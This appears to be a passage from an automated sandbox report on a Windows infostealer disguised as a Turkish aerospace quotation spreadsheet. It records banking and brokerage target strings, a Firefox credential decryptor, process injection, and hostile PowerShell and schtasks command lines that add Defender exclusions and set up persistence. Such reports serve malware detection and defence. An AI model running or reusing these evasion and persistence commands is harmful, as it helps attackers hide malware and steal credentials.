Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: WheTgQY.exe, 00000010.00000002.4485590144.0000000000B57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: WheTgQY.exe, 00000009.00000002.2081548688.0000000007D63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Code function: 10_2_055D9548 LdrInitializeThunk,LdrInitializeThunk,

10_2_055D9548

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe"
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WheTgQY.exe"
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WheTgQY.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Memory written: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Memory written: C:\Users\user\AppData\Roaming\WheTgQY.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WheTgQY.exe"	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process created: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmpECA5.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process created: C:\Users\user\AppData\Roaming\WheTgQY.exe "C:\Users\user\AppData\Roaming\WheTgQY.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process created: C:\Users\user\AppData\Roaming\WheTgQY.exe "C:\Users\user\AppData\Roaming\WheTgQY.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process created: C:\Users\user\AppData\Roaming\WheTgQY.exe "C:\Users\user\AppData\Roaming\WheTgQY.exe"	Jump to behavior

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Queries volume information: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
